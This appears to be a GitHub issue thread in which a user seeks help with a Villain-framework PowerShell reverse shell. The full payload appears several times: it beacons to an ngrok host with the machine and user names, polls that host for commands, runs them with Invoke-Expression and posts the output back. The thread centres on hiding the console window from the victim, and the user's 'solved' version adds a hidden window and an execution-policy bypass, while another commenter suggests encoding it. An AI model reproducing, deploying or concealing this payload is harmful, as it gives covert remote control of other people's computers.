carlos837
commented
1 year ago you need to encode it
Closed edikiuspy closed 1 year ago
carlos837
commented
1 year ago you need to encode it
edikiuspy
commented
1 year ago I think i found out problem. When i execute script in task manager I see a conhost.exe opens for a second but then it closes. But how can I fix it?
edikiuspy
commented
1 year ago solved with powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command $s='6aa9-80-238-115-54.eu.ngrok.io';$i='343fd7d3-60935f1b-7821cb5e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/343fd7d3/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/60935f1b -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/7821cb5e -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
I followed instructions on https://youtu.be/ubNUCvFOmwQ but when i try to hide it like this
Start-Process $PSHOME\powershell.exe -ArgumentList {$s='6aa9-80-238-115-54.eu.ngrok.io';$i='343fd7d3-60935f1b-7821cb5e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/343fd7d3/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/60935f1b -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/7821cb5e -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}} -WindowStyle Hiddenthere is no error but also I don't have any requests in ngrok server or sessions in Villain ,but when I run this code
$s='6aa9-80-238-115-54.eu.ngrok.io';$i='343fd7d3-60935f1b-7821cb5e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/343fd7d3/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"};for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/60935f1b -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"});if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$x=Invoke-RestMethod -Uri $p$s/7821cb5e -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="abc"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}everything works fine but it is visible for user. Is there a way to hide it?